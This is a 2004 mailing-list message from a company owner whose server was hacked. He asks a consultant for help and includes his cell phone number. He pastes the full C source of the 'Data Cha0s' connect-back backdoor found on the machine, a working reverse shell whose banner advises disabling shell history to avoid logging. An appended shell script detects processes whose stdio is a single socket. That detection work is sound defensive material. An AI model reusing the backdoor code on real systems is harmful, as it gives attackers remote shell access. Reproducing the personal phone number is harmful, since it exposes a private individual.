security (continued)

cliff at cliffmeyers.com
Mon Feb 2 16:18:22 EST 2004


Brad,


The source code is actually pretty small (3 KB).  I've pasted it at the end of
this message.

So, in the event that I get hacked *again* after doing my re-install tonight,
what would you recommend?  Would you consider coming in to do some freelance
security work for my company?  We could probably pay you some good cash assuming
you would be able to show us some tangible results in the end.  My assistant,
Phil LaNasa, recognized your name and said he had worked with you to some extent
when he was at Northwoods Insurance.  He also keeps in contact with Amedeo
Mariani (sp?) who is currently fixing a broken printer or two of ours here at the
office.  From what Phil tells me, you and Amedeo have done work together?

What do you think?  Feel free to give me a call if you like, my cellular is 716
907 3560.  Hope to hear from you - thanks.


-Cliff



# dc-connectback.c #

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
int main(int argc, char **argv) {
  char *host;
  int port = 80;
  int f;
  int l;
  int sock;
  struct in_addr ia;
  struct sockaddr_in sin, from;
  struct hostent *he;
  char msg[ ] = "Welcome to Data Cha0s Connect Back Shell\n\n"
                "Issue \"export TERM=xterm; exec bash -i\"\n"
                "For More Reliable Shell.\n"
                "Issue \"unset HISTFILE; unset SAVEHIST\"\n"
                "For Not Getting Logged.\n(;\n\n";
  printf("Data Cha0s Connect Back Backdoor\n\n");
  if (argc < 2 || argc > 3) {
    printf("Usage: %s [Host] <port>\n", argv[0]);
    return 1;
  }
  printf("[*] Dumping Arguments\n");
  l = strlen(argv[1]);
  if (l <= 0) {
    printf("[-] Invalid Host Name\n");
    return 1;
  }
  if (!(host = (char *) malloc(l))) {
    printf("[-] Unable to Allocate Memory\n");
    return 1;
  }
  strncpy(host, argv[1], l);
  if (argc == 3) {
    port = atoi(argv[2]);
    if (port <= 0 || port > 65535) {
      printf("[-] Invalid Port Number\n");
      return 1;
    }
  }
  printf("[*] Resolving Host Name\n");
  he = gethostbyname(host);
  if (he) {
    memcpy(&ia.s_addr, he->h_addr, 4);
  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
    printf("[-] Unable to Resolve: %s\n", host);
    return 1;
  }
  sin.sin_family = PF_INET;
  sin.sin_addr.s_addr = ia.s_addr;
  sin.sin_port = htons(port);
  printf("[*] Connecting...\n");
  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    printf("[-] Socket Error\n");
    return 1;
  }
  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
    printf("[-] Unable to Connect\n");
    return 1;
  }
  printf("[*] Spawning Shell\n");
  f = fork( );
  if (f < 0) {
    printf("[-] Unable to Fork\n");
    return 1;
  } else if (!f) {
    write(sock, msg, sizeof(msg));
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
    execl("/bin/sh", "shell", NULL);
    close(sock);
    return 0;
  }
  printf("[*] Detached\n\n");
  return 0;
}
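
The source above ends by duplicating the connected socket onto descriptors 0, 1 and 2 and then exec'ing /bin/sh, so the resulting shell has a single socket as its stdin, stdout and stderr. The check below is an added example, not part of the original message: it lists such processes from /proc on a Linux host. The function name find_socket_stdio and its proc-root argument are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original message): list processes whose
# stdin, stdout and stderr are all the same socket, which is the state
# the three dup2(sock, N) calls in dc-connectback.c leave /bin/sh in.

# Usage: find_socket_stdio [PROC_ROOT]
# Prints one line per match: "PID SOCKET_INODE REMOTE", where REMOTE is
# the rem_address column of that process's net/tcp table (the kernel's
# hex ADDR:PORT form) or "-" when the socket is not listed there.
# PROC_ROOT is a parameter of this example so the check can also be run
# against a copied or constructed tree; it defaults to /proc.
find_socket_stdio() {
    proc_root=${1:-/proc}
    for dir in "$proc_root"/[0-9]*; do
        # Unreadable or vanished processes are skipped, not reported.
        fd0=$(readlink "$dir/fd/0" 2>/dev/null) || continue
        fd1=$(readlink "$dir/fd/1" 2>/dev/null) || continue
        fd2=$(readlink "$dir/fd/2" 2>/dev/null) || continue
        # Only socket links are of interest (ttys, pipes, files are not).
        case $fd0 in
            socket:\[*\]) ;;
            *) continue ;;
        esac
        # All three descriptors must be the very same socket inode.
        [ "$fd0" = "$fd1" ] && [ "$fd0" = "$fd2" ] || continue
        inode=${fd0#socket:\[}
        inode=${inode%\]}
        # Field 10 of net/tcp is the socket inode, field 3 the peer.
        peer=$(awk -v i="$inode" '$10 == i { print $3; exit }' \
            "$dir/net/tcp" 2>/dev/null) || peer=""
        echo "${dir##*/} $inode ${peer:--}"
    done
}

# Scan the live system (or the tree given as the first argument).
find_socket_stdio "${1:-/proc}"
```

Run it as root to see every process. Services started from inetd have the same descriptor layout, so each hit still needs a look at its command line and peer address.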


